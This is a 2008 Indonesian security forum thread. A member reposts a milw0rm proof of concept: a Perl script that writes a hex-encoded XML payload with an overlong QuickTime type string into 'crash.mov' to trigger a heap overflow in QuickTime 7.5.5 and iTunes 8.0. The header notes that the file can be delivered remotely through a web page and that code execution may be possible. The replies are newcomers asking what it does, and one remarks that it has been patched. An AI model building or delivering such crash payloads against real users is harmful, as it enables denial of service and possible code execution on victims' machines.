Username Password

Register Here || Lost Password
View Thread
Explore Your Brain » All About Security I.T » Info Security
QuickTime 7.5.5 / ITunes 8.0 Remote Heap Overflow Crash Exploit Author securfrog
Username
Password
Register FAQ Members List Today's Posts Search

Print Thread

17-09-2008 01:51 PM QuickTime 7.5.5 / ITunes 8.0 Remote H...
User Avatar

EVA-00
HackAge


Posts: 2770
Joined: 21.05.08
Location: Wallahu a'lam
Age: 33
###############################################################################
# Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash
# Vendor: http://www.apple.com/
# Risk : high
#
# The "<? quicktime type= ?>" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
# This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding
# to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a
# remote crash on firefox, IE and any browser using the Quicktime plugin.
# Code execution may be possible.
my $payload =
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f".
"\x3e\x0d\x0a\x3c\x3f\x71\x75\x69\x63\x6b\x74\x69\x6d\x65\x20\x74\x79\x70\x65\x3d".
"\x22\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x71\x75\x69\x63\x6b".
"\x74\x69\x6d\x65\x2d\x6d\x65\x64\x69\x61\x2d\x6c\x69\x6e\x6b\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3f\x3e".
"\x0d\x0a\x3c\x65\x6d\x62\x65\x64\x20\x73\x72\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f".
"\x2f\x6e\x6f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x6e\x6f\x76\x69\x64\x7a\x2e\x6d".
"\x6f\x76\x22\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76".
"\x65\x72\x22\x20\x2f\x3e\x00";

my $file="crash.mov";
open(my $file, ">>$file") or die "Cannot open $file: $!";
print $file $payload;
close($file);

# milw0rm.com [2008-09-16]
Nabi Muhammad SAW bersabda :” Barangsiapa Yang Mengamalkan Ilmu Yang Ia Ketahui Maka Allah Akan Memberikan Kepadanya Ilmu Yang Belum Ia Ketahui” (HR. Imam Ahmad).

..::shn6 u!vJq Jnoh 3Joldx3 d33>I::..
 
Offline
18-09-2008 09:07 AM RE: QuickTime 7.5.5 / ITunes 8.0 Remote H...
User Avatar

suckeve
Anbu


Posts: 495
Joined: 30.08.08
Location: nowhere
Age: 30
bro bisa di jelasin dikit g???
kagak mudeng nih

maap newbieAngryAngry
 
Offline
23-09-2008 05:19 PM RE: QuickTime 7.5.5 / ITunes 8.0 Remote H...
User Avatar

udahjadi
Jounin Spesial


Posts: 220
Joined: 29.08.08
Location: JakTOWN®
Age: 39
weqs....apaan tuch ???
penjelasan plisss
Newbie™
Merdeka Indonesia...Maju terus...!!!
jangan mau kalah dari negara lain !!!
 
Offline
26-09-2008 11:23 AM RE: QuickTime 7.5.5 / ITunes 8.0 Remote H...
User Avatar

suckeve
Anbu


Posts: 495
Joined: 30.08.08
Location: nowhere
Age: 30
menurut penjelasan si empunya XYB,,
klo user bikin file kyk di atas, trus disimpen dengan nama crash.mov
trus di puter di Quicktime,,ntar jadinya crashWinkWink

tapi sekarang udah di patch kok


bukan bgtu bung EVA-00??Grin
 
Offline
Jump to Forum:
Forum powered by fusionBoard
Share this Thread
URL:
BBcode:
HTML:
Similar Threads
Thread Forum Replies Last Post
Tragedi bintaro (train crash) Out Of Topic 3 23-08-2014 10:22
Remote Desktop Linux – Debian Via Windows Remote Desktop Open Source OS 1 09-08-2014 08:15
Zedd-iTunes Session EP (2013) MP3 Album 2 03-12-2013 04:57
Fun. - iTunes Sessions EP (2012) MP3 Album 1 15-12-2012 02:48
Arctic Monkeys - Live iTunes Festival 2011 Video 5 14-12-2011 10:15
Copyright © 2007-2016